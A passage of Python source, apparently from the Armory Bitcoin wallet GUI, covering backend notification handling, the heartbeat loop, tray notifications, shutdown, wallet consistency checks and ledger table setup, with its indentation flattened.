tt = tt + self.tr('Last block received %1 ago').arg(secondsToHumanTime(blkRecvAgo))
return tt
self.lblArmoryStatus.setToolTipLambda(getToolTipTextOnline)
elif self.nodeStatus.status_ == Cpp.NodeStatus_Offline:
self.lblArmoryStatus.setText(\
self.tr('<font color=%1><b>Node offline (%2 blocks)</b></font> ').arg(\
htmlColor('TextRed')).arg(TheBDM.getTopBlockHeight()))
def getToolTipTextOffline():
blkRecvAgo = RightNow() - self.blkReceived
tt = self.tr(
'Disconnected from Bitcoin Node, cannot update history '
'<br><br>Last known block: %1 <br>Received %2 ago').arg(TheBDM.getTopBlockHeight()).arg(secondsToHumanTime(blkRecvAgo))
return tt
self.lblArmoryStatus.setToolTipLambda(getToolTipTextOffline)
#############################################################################
def handleCppNotification(self, action, args):
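# Dispatch on the notification type pushed up from the C++ side; most
# branches refresh the wallet data from the DB first, then update the UI.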
if action == FINISH_LOAD_BLOCKCHAIN_ACTION:
#Blockchain just finished loading, finish initializing UI and render the
#ledgers
self.nodeStatus = TheBDM.bdv().getNodeStatus()
TheBDM.setWitness(self.nodeStatus.SegWitEnabled_)
try:
self.updateWalletData()
except Exception as e:
LOGERROR("Failed update wallet data with error: %s" % e)
return
for wltid in self.walletMap:
self.walletMap[wltid].detectHighestUsedIndex()
self.blkReceived = RightNow()
if self.needUpdateAfterScan:
LOGDEBUG('Running finishLoadBlockchain')
self.finishLoadBlockchainGUI()
self.needUpdateAfterScan = False
self.setDashboardDetails()
self.updateStatusBarText()
elif action == NEW_ZC_ACTION and not CLI_OPTIONS.ignoreZC:
#A zero-conf tx concerns one of the addresses Armory is tracking; pull the
#updated ledgers from the BDM and create the related notifications.
try:
self.updateWalletData()
except Exception as e:
LOGERROR("Failed update wallet data with error: %s" % e)
return
self.notifyNewZeroConf(args)
self.createCombinedLedger()
elif action == NEW_BLOCK_ACTION:
#A new block has appeared, pull updated ledgers from the BDM, display
#the new block height in the status bar and note the block received time
try:
self.updateWalletData()
except Exception as e:
LOGERROR("Failed update wallet data with error: %s" % e)
return
newBlocks = args[0]
if newBlocks>0:
print 'New Block: ', TheBDM.getTopBlockHeight()
self.ledgerModel.reset()
LOGINFO('New Block! : %d', TheBDM.getTopBlockHeight())
self.createCombinedLedger()
self.blkReceived = RightNow()
self.writeSetting('LastBlkRecvTime', self.blkReceived)
self.writeSetting('LastBlkRecv', TheBDM.getTopBlockHeight())
if self.netMode==NETWORKMODE.Full:
LOGINFO('Current block number: %d', TheBDM.getTopBlockHeight())
# Update the wallet view to immediately reflect new balances
self.walletModel.reset()
self.updateStatusBarText()
elif action == REFRESH_ACTION:
#The wallet ledgers have been updated from an event outside of new ZC
#or new blocks (usually a wallet or address was imported, or the
#wallet filter was modified)
try:
self.updateWalletData()
except Exception as e:
LOGERROR("Failed update wallet data with error: %s" % e)
return
reset = False
if len(args) == 0:
self.createCombinedLedger()
return
for wltID in args:
if len(wltID) > 0:
if wltID in self.walletMap:
wlt = self.walletMap[wltID]
wlt.isEnabled = True
self.walletModel.reset()
wlt.doAfterScan()
self.changeWltFilter()
if wltID in self.oneTimeScanAction:
postScanAction = self.oneTimeScanAction[wltID]
del self.oneTimeScanAction[wltID]
if callable(postScanAction):
postScanAction()
elif wltID in self.lockboxIDMap:
lbID = self.lockboxIDMap[wltID]
self.allLockboxes[lbID].isEnabled = True
if self.lbDialogModel != None:
self.lbDialogModel.reset()
if self.lbDialog != None:
self.lbDialog.changeLBFilter()
elif wltID == "wallet_filter_changed":
reset = True
if wltID in self.walletSideScanProgress:
del self.walletSideScanProgress[wltID]
self.createCombinedLedger(reset)
elif action == WARNING_ACTION:
#something went wrong on the C++ side, create a message box to report
#it to the user
if 'rescan' in args[0].lower() or 'rebuild' in args[0].lower():
result = MsgBoxWithDNAA(self, self, MSGBOX.Critical, self.tr('BDM error!'), args[0],
self.tr("Rebuild and rescan on next start"), dnaaStartChk=False)
if result[1] == True:
touchFile( os.path.join(ARMORY_HOME_DIR, 'rebuild.flag') )
elif 'factory reset' in args[0].lower():
result = MsgBoxWithDNAA(self, self, MSGBOX.Critical, self.tr('BDM error!'), args[0],
self.tr("Factory reset on next start"), dnaaStartChk=False)
if result[1] == True:
DlgFactoryReset(self, self).exec_()
else:
QMessageBox.critical(self, self.tr('BlockDataManager Warning'), \
args[0], \
QMessageBox.Ok)
#this is a critical error reporting channel, should kill the app right
#after
os._exit(0)
elif action == SCAN_ACTION:
wltIDList = args[0]
prog = args[1]
hasWallet = False
hasLockbox = False
for wltID in wltIDList:
self.walletSideScanProgress[wltID] = prog*100
if len(wltID) > 0:
if wltID in self.walletMap:
wlt = self.walletMap[wltID]
wlt.disableWalletUI()
if wltID in self.walletDialogDict:
self.walletDialogDict[wltID].reject()
del self.walletDialogDict[wltID]
hasWallet = True
else:
lbID = self.lockboxIDMap[wltID]
self.allLockboxes[lbID].isEnabled = False
hasLockbox = True
self.walletModel.reset()
if hasWallet:
self.changeWltFilter()
if hasLockbox:
if self.lbDialogModel != None:
self.lbDialogModel.reset()
if self.lbDialog != None:
self.lbDialog.resetLBSelection()
self.lbDialog.changeLBFilter()
elif action == NODESTATUS_UPDATE:
prevStatus = None
if self.nodeStatus != None:
prevStatus = self.nodeStatus.status_
self.nodeStatus = args[0]
TheSDM.updateState(self.nodeStatus)
if prevStatus != self.nodeStatus.status_:
TheBDM.setWitness(self.nodeStatus.SegWitEnabled_)
if self.nodeStatus.status_ == Cpp.NodeStatus_Offline:
self.showTrayMsg(self.tr('Disconnected'), self.tr('Connection to Bitcoin Core '
'client lost! Armory cannot send nor '
'receive bitcoins until connection is '
're-established.'), QSystemTrayIcon.Critical,
10000)
elif self.nodeStatus.status_ == Cpp.NodeStatus_Online:
self.showTrayMsg(self.tr('Connected'), self.tr('Connection to Bitcoin Core '
're-established'), \
QSystemTrayIcon.Information, 10000)
self.updateStatusBarText()
self.updateSyncProgress()
elif action == BDM_SCAN_PROGRESS:
self.setDashboardDetails()
self.updateSyncProgress()
elif action == BDV_ERROR:
errorStruct = args[0]
if errorStruct.errType_ == Cpp.Error_ZC:
errorMsg = errorStruct.errorStr_
txHash = errorStruct.extraMsg_
self.zcBroadcastError(txHash, errorMsg)
#############################################################################
def Heartbeat(self, nextBeatSec=1):
"""
This method is invoked when the app is initialized, and will
run every second, or whatever is specified in the nextBeatSec
argument.
"""
# Special heartbeat functions are for special windows that may need
# to update much more often, say every 0.1s, when that window is all
# that matters at the moment, like a download progress window.
# This is "special" because you are putting all other processing on
# hold while this special window is active.
# IMPORTANT: Make sure that the special heartbeat function returns
# a value below zero when it's done OR if it errors out!
# Otherwise, it should return the next heartbeat delay,
# which would probably be something like 0.1 for a rapidly
# updating progress counter
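# Illustrative sketch (not part of the original code) of a special heartbeat
# function following the contract above, assuming a hypothetical dialog that
# exposes a getProgressPct() method:
#
#   def _specialProgressBeat():
#      pct = someProgressDlg.getProgressPct()   # hypothetical source
#      if pct >= 1.0:
#         return -1      # done: drop back to the normal 1-second heartbeat
#      return 0.1        # keep updating rapidly
#
#   self.extraHeartbeatSpecial.append(_specialProgressBeat)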
for fn in self.extraHeartbeatSpecial:
try:
nextBeat = fn()
if nextBeat>0:
reactor.callLater(nextBeat, self.Heartbeat)
else:
self.extraHeartbeatSpecial = []
reactor.callLater(1, self.Heartbeat)
except:
LOGEXCEPT('Error in special heartbeat function')
self.extraHeartbeatSpecial = []
reactor.callLater(1, self.Heartbeat)
return
if TheBDM.exception != "":
QMessageBox.warning(self, self.tr('Database Error'), self.tr(
'The DB has returned the following error: <br><br> '
'<b> %1 </b> <br><br> Armory will now shutdown.').arg(TheBDM.exception), QMessageBox.Ok)
self.closeForReal()
# SatoshiDaemonManager
# BlockDataManager
sdmState = TheSDM.getSDMState()
bdmState = TheBDM.getState()
self.heartbeatCount += 1
try:
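# extraHeartbeatAlways entries are either plain callables or
# [func, argList, keepRunning] triples; one-shot entries (keepRunning set
# to False) are removed from the list before being invoked.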
for func in self.extraHeartbeatAlways:
if isinstance(func, list):
fnc = func[0]
kargs = func[1]
keep_running = func[2]
if not keep_running:
self.extraHeartbeatAlways.remove(func)
fnc(*kargs)
else:
func()
if self.doAutoBitcoind:
if (sdmState in ['BitcoindInitializing','BitcoindSynchronizing']) or \
(sdmState == 'BitcoindReady' and bdmState==BDM_SCANNING):
self.updateSyncProgress()
else:
if bdmState in (BDM_OFFLINE,BDM_UNINITIALIZED):
# This call seems out of place, but it's because if you are in offline
# mode, it needs to check periodically for the existence of Bitcoin Core
# so that it can enable the "Go Online" button
self.setDashboardDetails()
return
elif bdmState==BDM_SCANNING: # TODO - Move to handle cpp notification
self.updateSyncProgress()
if self.netMode==NETWORKMODE.Disconnected:
if self.isOnlineModePossible():
self.switchNetworkMode(NETWORKMODE.Full)
if bdmState==BDM_BLOCKCHAIN_READY:
# Trigger any notifications, if we have them... TODO - Remove add to new block, and block chain ready
self.doTheSystemTrayThing()
# Any extra functions that may have been injected to be run TODO - Call on New block
# when new blocks are received.
if len(self.extraNewBlockFunctions) > 0:
cppHead = TheBDM.getMainBlockFromDB(self.currBlockNum)
pyBlock = PyBlock().unserialize(cppHead.getSerializedBlock())
for blockFunc in self.extraNewBlockFunctions:
blockFunc(pyBlock)
# TODO - remove
for func in self.extraHeartbeatOnline:
func()
except:
# When getting the error info, don't collect the traceback in order to
# avoid circular references. https://docs.python.org/2/library/sys.html
# has more info.
LOGEXCEPT('Error in heartbeat function')
(errType, errVal) = sys.exc_info()[:2]
errStr = 'Error Type: %s\nError Value: %s' % (errType, errVal)
LOGERROR(errStr)
finally:
reactor.callLater(nextBeatSec, self.Heartbeat)
#############################################################################
def printAlert(self, moneyID, ledgerAmt, txAmt):
'''
Function that prints a notification for a transaction that affects an
address we control.
'''
dispLines = QStringList()
title = ''
totalStr = coin2strNZS(txAmt)
if moneyID in self.walletMap:
wlt = self.walletMap[moneyID]
if len(wlt.labelName) <= 20:
dispName = '"%(name)s"' % { 'name' : wlt.labelName }
else:
dispName = '"%(shortname)s..."' % { 'shortname' : wlt.labelName[:17] }
dispName = self.tr('Wallet %1 (%2)').arg(dispName, wlt.uniqueIDB58)
elif moneyID in self.cppLockboxWltMap:
lbox = self.getLockboxByID(moneyID)
if len(lbox.shortName) <= 20:
dispName = '%(M)d-of-%(N)d "%(shortname)s"' % { 'M' : lbox.M, 'N' : lbox.N, 'shortname' : lbox.shortName}
else:
dispName = ('%(M)d-of-%(N)d "%(shortname)s..."') % {'M' : lbox.M, 'N' : lbox.N, 'shortname' : lbox.shortName[:17] }
dispName = self.tr('Lockbox %1 (%2)').arg(dispName, lbox.uniqueIDB58)
else:
LOGERROR('Asked to show notification for wlt/lbox we do not have')
return
# Collected everything we need to display, now construct it and do it.
if ledgerAmt > 0:
# Received!
title = self.tr('Bitcoins Received!')
dispLines.append(self.tr('Amount: %1 BTC').arg(totalStr ))
dispLines.append(self.tr('Recipient: %1').arg(dispName))
elif ledgerAmt < 0:
# Sent!
title = self.tr('Bitcoins Sent!')
dispLines.append(self.tr('Amount: %1 BTC').arg(totalStr))
dispLines.append(self.tr('Sender: %1').arg(dispName))
self.showTrayMsg(title, dispLines.join('\n'), \
QSystemTrayIcon.Information, 10000)
LOGINFO(title)
#############################################################################
def doTheSystemTrayThing(self):
"""
I named this method as it is because this is not just "show a message."
I need to display all relevant transactions, in sequence that they were
received. I will store them in self.notifyQueue, and this method will
do nothing if it's empty.
"""
if not TheBDM.getState()==BDM_BLOCKCHAIN_READY or \
RightNow()<self.notifyBlockedUntil:
return
# Notify queue input is: [WltID/LBID, LedgerEntry, alreadyNotified]
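# Entries are assumed to be appended elsewhere roughly as
#   self.notifyQueue.append([wltID, ledgerEntry, False])
# and each un-notified entry is processed here in the order received.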
for i in range(len(self.notifyQueue)):
moneyID, le, alreadyNotified = self.notifyQueue[i]
# Skip the ones we've notified of already.
if alreadyNotified:
continue
# Mark it alreadyNotified=True
self.notifyQueue[i][2] = True
# Catch condition that somehow the tx isn't related to us
if le.getTxHash()=='\x00'*32:
continue
# Make sure the wallet ID or lockbox ID keys are actually valid before
# using them to grab the appropriate C++ wallet.
pywlt = self.walletMap.get(moneyID)
lbox = self.getLockboxByID(moneyID)
# If we couldn't find a matching wallet or lbox, bail
if pywlt is None and lbox is None:
LOGERROR('Could not find moneyID = %s; skipping notify' % moneyID)
continue
if pywlt:
wname = self.walletMap[moneyID].labelName
if len(wname)>20:
wname = wname[:17] + '...'
wltName = self.tr('Wallet "%1" (%2)').arg(wname, moneyID)
else:
lbox = self.getLockboxByID(moneyID)
M = self.getLockboxByID(moneyID).M
N = self.getLockboxByID(moneyID).N
lname = self.getLockboxByID(moneyID).shortName
if len(lname) > 20:
lname = lname[:17] + '...'
wltName = self.tr('Lockbox %1-of-%2 "%3" (%4)').arg(M).arg(N).arg(lname, moneyID)
if le.isSentToSelf():
# Used to display the sent-to-self amount, but if this is a lockbox
# we only have a cppWallet, and the determineSentToSelfAmt() func
# only operates on python wallets. Oh well, the user can double-
# click on the tx in their ledger if they want to see what's in it.
# amt = determineSentToSelfAmt(le, cppWlt)[0]
# self.showTrayMsg('Your bitcoins just did a lap!', \
# 'Wallet "%s" (%s) just sent %s BTC to itself!' % \
# (wlt.labelName, moneyID, coin2str(amt,maxZeros=1).strip()),
self.showTrayMsg(self.tr('Your bitcoins just did a lap!'), \
self.tr('%1 just sent some BTC to itself!').arg(wltName), \
QSystemTrayIcon.Information, 10000)
return
# If coins were either received or sent from the loaded wlt/lbox
dispLines = QStringList()
totalStr = coin2strNZS(abs(le.getValue()))
title = None
if le.getValue() > 0:
title = self.tr('Bitcoins Received!')
dispLines.append(self.tr('Amount: %1 BTC').arg(totalStr))
dispLines.append(self.tr('From: %1').arg(wltName))
elif le.getValue() < 0:
try:
recipStr = ''
for addr in le.getScrAddrList():
if pywlt.hasScrAddr(addr):
continue
if len(recipStr)==0:
recipStr = scrAddr_to_addrStr(addr)
else:
recipStr = self.tr('<Multiple Recipients>')
title = self.tr('Bitcoins Sent!')
dispLines.append(unicode(self.tr('Amount: %1 BTC').arg(totalStr)))
dispLines.append(unicode(self.tr('From: %1').arg(wltName )))
dispLines.append(unicode(self.tr('To: %1').arg(recipStr)))
except Exception as e:
LOGERROR('tx broadcast systray display failed with error: %s' % e)
if title:
self.showTrayMsg(title, dispLines.join("\n"), \
QSystemTrayIcon.Information, 10000)
LOGINFO(title + '\n' + dispLines.join("\n"))
# Wait for 5 seconds before processing the next queue object.
self.notifyBlockedUntil = RightNow() + 5
return
#############################################################################
def closeEvent(self, event=None):
moc = self.getSettingOrSetDefault('MinimizeOrClose', 'DontKnow')
doClose, doMinimize = False, False
if moc=='DontKnow':
reply,remember = MsgBoxWithDNAA(self, self, MSGBOX.Question, self.tr('Minimize or Close'), \
self.tr('Would you like to minimize Armory to the system tray instead '
'of closing it?'), dnaaMsg=self.tr('Remember my answer'), \
yesStr=self.tr('Minimize'), noStr=self.tr('Close'))
if reply==True:
doMinimize = True
if remember:
self.writeSetting('MinimizeOrClose', 'Minimize')
else:
doClose = True
if remember:
self.writeSetting('MinimizeOrClose', 'Close')
if doMinimize or moc=='Minimize':
self.minimizeArmory()
if event:
event.ignore()
elif doClose or moc=='Close':
self.doShutdown = True
self.sysTray.hide()
self.closeForReal()
if event: event.ignore()
else:
return # how would we get here?
#############################################################################
def unpackLinuxTarGz(self, targzFile, changeSettings=True):
if targzFile is None:
return None
if not os.path.exists(targzFile):
return None
unpackDir = os.path.join(ARMORY_HOME_DIR, 'latestBitcoinInst')
unpackDir2 = os.path.join(ARMORY_HOME_DIR, 'latestBitcoinInstOld')
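# Keep exactly one previous unpack around: rotate 'latestBitcoinInst' to
# 'latestBitcoinInstOld' before extracting the new tarball into a fresh dir.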
if os.path.exists(unpackDir):
if os.path.exists(unpackDir2):
shutil.rmtree(unpackDir2)
shutil.move(unpackDir, unpackDir2)
os.mkdir(unpackDir)
out,err = execAndWait('tar -zxf %s -C %s' % (targzFile, unpackDir), \
timeout=5)
LOGINFO('UNPACK STDOUT: "' + out + '"')
LOGINFO('UNPACK STDERR: "' + err + '"')
# There should only be one subdir
unpackDirChild = None
for fn in os.listdir(unpackDir):
unpackDirChild = os.path.join(unpackDir, fn)
if unpackDirChild is None:
LOGERROR('There was apparently an error unpacking the file')
return None
finalDir = os.path.abspath(unpackDirChild)
LOGWARN('Bitcoin Core unpacked into: %s', finalDir)
if changeSettings:
self.settings.set('SatoshiExe', finalDir)
return finalDir
#############################################################################
def closeForReal(self):
'''
Unlike File->Quit or clicking the X on the window, which may actually
minimize Armory, this method is for *really* closing Armory
'''
self.setCursor(Qt.WaitCursor)
self.showShuttingDownMessage()
try:
# Save the main window geometry in the settings file
try:
self.writeSetting('MainGeometry', str(self.saveGeometry().toHex()))
self.writeSetting('MainWalletCols', saveTableView(self.walletsView))
self.writeSetting('MainLedgerCols', saveTableView(self.ledgerView))
except:
pass
if TheBDM.getState()==BDM_SCANNING:
LOGINFO('BDM state is scanning -- force shutdown BDM')
else:
LOGINFO('BDM is safe for clean shutdown')
TheSDM.stopBitcoind()
TheBDM.shutdown()
# Remove Temp Modules Directory if it exists:
if self.tempModulesDirName:
shutil.rmtree(self.tempModulesDirName)
except:
# Don't want a strange error here to interrupt shutdown
LOGEXCEPT('Strange error during shutdown')
LOGINFO('Attempting to close the main window!')
self.signalExecution.executeMethod(QAPP.quit)
#############################################################################
def execTrigger(self, toSpawn):
super(ArmoryDialog, toSpawn).exec_()
#############################################################################
def initTrigger(self, toInit):
if isinstance(toInit, DlgProgress):
toInit.setup(self)
toInit.status = 1
#############################################################################
def checkForNegImports(self):
negativeImports = []
for wlt in self.walletMap:
if self.walletMap[wlt].hasNegativeImports:
negativeImports.append(self.walletMap[wlt].uniqueIDB58)
# If we detect any negative import
if len(negativeImports) > 0:
logDirs = []
for wltID in negativeImports:
if not wltID in self.walletMap:
continue
homedir = os.path.dirname(self.walletMap[wltID].walletPath)
wltlogdir = os.path.join(homedir, wltID)
if not os.path.exists(wltlogdir):
continue
for subdirname in os.listdir(wltlogdir):
subdirpath = os.path.join(wltlogdir, subdirname)
logDirs.append([wltID, subdirpath])
DlgInconsistentWltReport(self, self, logDirs).exec_()
#############################################################################
def getAllRecoveryLogDirs(self, wltIDList):
self.logDirs = []
for wltID in wltIDList:
if not wltID in self.walletMap:
continue
homedir = os.path.dirname(self.walletMap[wltID].walletPath)
logdir = os.path.join(homedir, wltID)
if not os.path.exists(logdir):
continue
self.logDirs.append([wltID, logdir])
return self.logDirs
#############################################################################
@AllowAsync
def CheckWalletConsistency(self, wallets, prgAt=None):
if prgAt:
totalSize = 0
walletSize = {}
for wlt in wallets:
statinfo = os.stat(wallets[wlt].walletPath)
walletSize[wlt] = statinfo.st_size
totalSize = totalSize + statinfo.st_size
i=0
dlgrdy = [0]
nerrors = 0
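# Progress is reported on a 0-10000 scale (matching the progress bar created
# in checkWallets() below); each wallet contributes proportionally to its
# file size.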
for wlt in wallets:
if prgAt:
prgAt[0] = i
f = 10000*walletSize[wlt]/totalSize
prgAt[1] = f
i = f +i
self.wltCstStatus = WalletConsistencyCheck(wallets[wlt], prgAt)
if self.wltCstStatus[0] != 0:
self.WltCstError(wallets[wlt], self.wltCstStatus[1], dlgrdy)
while not dlgrdy[0]:
time.sleep(0.01)
nerrors = nerrors +1
prgAt[2] = 1
dlgrdy[0] = 0
while prgAt[2] != 2:
time.sleep(0.1)
if nerrors == 0:
self.emit(SIGNAL('UWCS'), [1, self.tr('All wallets are consistent'), 10000, dlgrdy])
self.emit(SIGNAL('checkForNegImports'))
else:
while not dlgrdy[0]:
self.emit(SIGNAL('UWCS'), [1, self.tr('Consistency Check Failed!'), 0, dlgrdy])
time.sleep(1)
self.checkRdyForFix()
def checkRdyForFix(self):
#check BDM first
time.sleep(1)
self.dlgCptWlt.emit(SIGNAL('Show'))
while 1:
if TheBDM.getState() == BDM_SCANNING:
canFix = self.tr(
'The wallet analysis tool will become available '
'as soon as Armory is done loading. You can close this '
'window and it will reappear when ready.')
self.dlgCptWlt.UpdateCanFix([canFix])
time.sleep(1)
elif TheBDM.getState() == BDM_OFFLINE or \
TheBDM.getState() == BDM_UNINITIALIZED:
TheSDM.setDisabled(True)
CLI_OPTIONS.offline = True
break
else:
break
#check running dialogs
self.dlgCptWlt.emit(SIGNAL('Show'))
runningList = []
while 1:
listchanged = 0
canFix = []
for dlg in runningList:
if dlg not in runningDialogsList:
runningList.remove(dlg)
listchanged = 1
for dlg in runningDialogsList:
if not isinstance(dlg, DlgCorruptWallet):
if dlg not in runningList:
runningList.append(dlg)
listchanged = 1
if len(runningList):
if listchanged:
canFix.append(self.tr(
'<b>The following dialogs need to be closed before you can '
'run the wallet analysis tool:</b>'))
canFix.extend([str(myobj.windowTitle()) for myobj in runningList])
self.dlgCptWlt.UpdateCanFix(canFix)
time.sleep(0.2)
else:
break
canFix.append('Ready to analyze inconsistent wallets!')
self.dlgCptWlt.UpdateCanFix(canFix, True)
self.dlgCptWlt.exec_()
def checkWallets(self):
nwallets = len(self.walletMap)
if nwallets > 0:
self.prgAt = [0, 0, 0]
self.pbarWalletProgress = QProgressBar()
self.pbarWalletProgress.setMaximum(10000)
self.pbarWalletProgress.setMaximumSize(300, 22)
self.pbarWalletProgress.setStyleSheet('text-align: center; margin-bottom: 2px; margin-left: 10px;')
self.pbarWalletProgress.setFormat(self.tr('Wallet Consistency Check: %p%'))
self.pbarWalletProgress.setValue(0)
self.statusBar().addWidget(self.pbarWalletProgress)
self.connect(self, SIGNAL('UWCS'), self.UpdateWalletConsistencyStatus)
self.connect(self, SIGNAL('PWCE'), self.PromptWltCstError)
self.CheckWalletConsistency(self.walletMap, self.prgAt, async=True)
self.UpdateConsistencyCheckMessage(async = True)
@AllowAsync
def UpdateConsistencyCheckMessage(self):
while self.prgAt[2] == 0:
self.emit(SIGNAL('UWCS'), [0, self.prgAt[0]])
time.sleep(0.5)
self.emit(SIGNAL('UWCS'), [2])
self.prgAt[2] = 2
def UpdateWalletConsistencyStatus(self, msg):
if msg[0] == 0:
self.pbarWalletProgress.setValue(msg[1])
elif msg[0] == 1:
self.statusBar().showMessage(msg[1], msg[2])
msg[3][0] = 1
else:
self.pbarWalletProgress.hide()
def WltCstError(self, wlt, status, dlgrdy):
self.emit(SIGNAL('PWCE'), dlgrdy, wlt, status)
LOGERROR('Wallet consistency check failed! (%s)', wlt.uniqueIDB58)
def PromptWltCstError(self, dlgrdy, wallet=None, status='', mode=None):
if not self.dlgCptWlt:
self.dlgCptWlt = DlgCorruptWallet(wallet, status, self, self)
dlgrdy[0] = 1
else:
self.dlgCptWlt.addStatus(wallet, status)
if not mode:
self.dlgCptWlt.show()
else:
self.dlgCptWlt.exec_()
#############################################################################
def loadNewPage(self):
pageInt = int(self.PageLineEdit.text())
if pageInt == self.mainLedgerCurrentPage:
return
if pageInt < 0 or pageInt > TheBDM.bdv().getWalletsPageCount():
self.PageLineEdit.setText(str(self.mainLedgerCurrentPage))
return
previousPage = self.mainLedgerCurrentPage
try:
self.mainLedgerCurrentPage = pageInt
self.createCombinedLedger()
except:
self.mainLedgerCurrentPage = previousPage
self.PageLineEdit.setText(str(self.mainLedgerCurrentPage))
#############################################################################
# System tray notifications require specific code for OS X. We'll handle
# messages here to hide the ugliness.
def showTrayMsg(self, dispTitle, dispText, dispIconType, dispTime):
if not OS_MACOSX:
self.sysTray.showMessage(dispTitle, dispText, dispIconType, dispTime)
else:
# Code supporting Growl (OSX 10.7) is buggy, and no one seems to care.
# Just jump straight to 10.8.
self.macNotifHdlr.showNotification(dispTitle, dispText)
#############################################################################
def bdv(self):
return TheBDM.bdv()
#############################################################################
def setupBDV(self):
if self.netMode == NETWORKMODE.Offline:
return
try:
TheBDM.registerBDV()
self.walletManager.setBDVObject(TheBDM.bdv())
except:
self.switchNetworkMode(NETWORKMODE.Offline)
return
for wltId in self.walletMap:
self.walletMap[wltId].registerWallet()
for lbObj in self.allLockboxes:
lbID = lbObj.uniqueIDB58
scrAddrList = lbObj.getScrAddrList()
self.cppLockboxWltMap[lbID] = lbObj.registerLockbox(scrAddrList, False)
#############################################################################
def startBlockchainProcessingInitialization(self):
self.startBitcoindIfNecessary()
self.completeBlockchainProcessingInitialization()
#############################################################################
def completeBlockchainProcessingInitialization(self):
if CLI_OPTIONS.offline:
return
gotDB = self.startArmoryDBIfNecessary()
if gotDB == False:
TheBDM.setState(BDM_OFFLINE)
self.switchNetworkMode(NETWORKMODE.Offline)
QMessageBox.warning(self, self.tr('Database Error'), self.tr(
'Armory failed to spawn the DB!<br> '
'Continuing operations in offline mode instead. <br> '
'Refer to the dbLog.txt for more information.'), QMessageBox.Ok)
self.setDashboardDetails()
return
else:
self.switchNetworkMode(NETWORKMODE.Full)
TheBDM.instantiateBDV(armoryengine.ArmoryUtils.ARMORYDB_PORT)
self.setupBDV()
self.setupLedgerViews()
self.loadBlockchainIfNecessary()
self.setDashboardDetails()
#############################################################################
def setupLedgerViews(self):
if self.netMode == NETWORKMODE.Offline:
return
# Table to display ledger/activity
w,h = tightSizeNChar(self.walletsView, 55)
viewWidth = 1.2*w
sectionSz = 1.3*h
viewHeight = 4.4*sectionSz
self.ledgerTable = []
self.ledgerModel = LedgerDispModelSimple(self.ledgerTable, self, self)
self.ledgerModel.setLedgerDelegate(TheBDM.bdv().getLedgerDelegateForWallets())
self.ledgerModel.setConvertLedgerMethod(self.convertLedgerToTable)
self.frmLedgUpDown = QFrame()
self.ledgerView = ArmoryTableView(self, self, self.frmLedgUpDown)
self.ledgerView.setModel(self.ledgerModel)
self.ledgerView.setSortingEnabled(True)
self.ledgerView.setItemDelegate(LedgerDispDelegate(self))
self.ledgerView.setSelectionBehavior(QTableView.SelectRows)
self.ledgerView.setSelectionMode(QTableView.SingleSelection)
self.ledgerView.verticalHeader().setDefaultSectionSize(sectionSz)
self.ledgerView.verticalHeader().hide()
self.ledgerView.horizontalHeader().setResizeMode(0, QHeaderView.Fixed)
self.ledgerView.horizontalHeader().setResizeMode(3, QHeaderView.Fixed)
self.ledgerView.hideColumn(LEDGERCOLS.isOther)
self.ledgerView.hideColumn(LEDGERCOLS.UnixTime)
self.ledgerView.hideColumn(LEDGERCOLS.WltID)
self.ledgerView.hideColumn(LEDGERCOLS.TxHash)
self.ledgerView.hideColumn(LEDGERCOLS.isCoinbase)
self.ledgerView.hideColumn(LEDGERCOLS.toSelf)
self.ledgerView.hideColumn(LEDGERCOLS.optInRBF)
# Another table and model, for lockboxes
self.currentLBPage = 0
self.lockboxLedgTable = []
self.lockboxLedgModel = LedgerDispModelSimple(self.lockboxLedgTable,
self, self, isLboxModel=True)
self.lockboxLedgModel.setLedgerDelegate(TheBDM.bdv().getLedgerDelegateForLockboxes())
self.lockboxLedgModel.setConvertLedgerMethod(self.convertLedgerToTable)
self.lbDialogModel = None
dateWidth = tightSizeStr(self.ledgerView, '_9999-Dec-99 99:99pm__')[0]
cWidth = 20 # num-confirm icon width
tWidth = 72 # date icon width
initialColResize(self.ledgerView, [cWidth, 0, dateWidth, tWidth, 0.30, 0.40, 0.3])
self.connect(self.ledgerView, SIGNAL('doubleClicked(QModelIndex)'), \
self.dblClickLedger)
self.ledgerView.setContextMenuPolicy(Qt.CustomContextMenu)
self.ledgerView.customContextMenuRequested.connect(self.showContextMenuLedger)
self.connect(self.ledgerView.horizontalHeader(), \
SIGNAL('sortIndicatorChanged(int,Qt::SortOrder)'), \
self.changeLedgerSorting)
#page selection UI
self.mainLedgerCurrentPage = 1
self.lblPages = QRichLabel('Page: ')
self.PageLineEdit = QLineEdit('1')
self.lblNPages = QRichLabel(' out of 1')
self.connect(self.PageLineEdit, SIGNAL('editingFinished()'), \
self.loadNewPage)
self.changeWltFilter()
# Will fill this in when ledgers are created & combined
self.lblLedgShowing = QRichLabel('Showing:', hAlign=Qt.AlignHCenter)
self.lblLedgRange = QRichLabel('', hAlign=Qt.AlignHCenter)
self.lblLedgTotal = QRichLabel('', hAlign=Qt.AlignHCenter)
self.comboNumShow = QComboBox()
for s in self.numShowOpts:
self.comboNumShow.addItem( str(s) )
self.comboNumShow.setCurrentIndex(0)
self.comboNumShow.setMaximumWidth( tightSizeStr(self, '_9999_')[0]+25 )
self.btnLedgUp = QLabelButton('')
self.btnLedgUp.setMaximumHeight(20)
self.btnLedgUp.setPixmap(QPixmap(':/scroll_up_18.png'))
self.btnLedgUp.setAlignment(Qt.AlignVCenter | Qt.AlignHCenter)
self.btnLedgUp.setVisible(False)
self.btnLedgDn = QLabelButton('')
self.btnLedgDn.setMaximumHeight(20)
self.btnLedgDn.setPixmap(QPixmap(':/scroll_down_18.png'))
self.btnLedgDn.setAlignment(Qt.AlignVCenter | Qt.AlignHCenter)
self.connect(self.comboNumShow, SIGNAL('activated(int)'), self.changeNumShow)
self.connect(self.btnLedgUp, SIGNAL('clicked()'), self.clickLedgUp)
self.connect(self.btnLedgDn, SIGNAL('clicked()'), self.clickLedgDn)
frmFilter = makeVertFrame([QLabel(self.tr('Filter:')), self.comboWltSelect, 'Stretch'])
frmLower = makeHorizFrame([ frmFilter, \
'Stretch', \
self.frmLedgUpDown, \
'Stretch', \
self.frmTotals])
# Now add the ledger to the bottom of the window
ledgLayout = QGridLayout()
ledgLayout.addWidget(self.ledgerView, 1,0)
ledgLayout.addWidget(frmLower, 2,0)
ledgLayout.setRowStretch(0, 0)
ledgLayout.setRowStretch(1, 1)
ledgLayout.setRowStretch(2, 0)
self.tabActivity = QWidget()
self.tabActivity.setLayout(ledgLayout)
self.mainDisplayTabs.addTab(self.tabActivity, self.tr('Transactions'))
hexledgsz = self.settings.get('MainLedgerCols')
if len(hexledgsz)>0:
restoreTableView(self.ledgerView, hexledgsz)
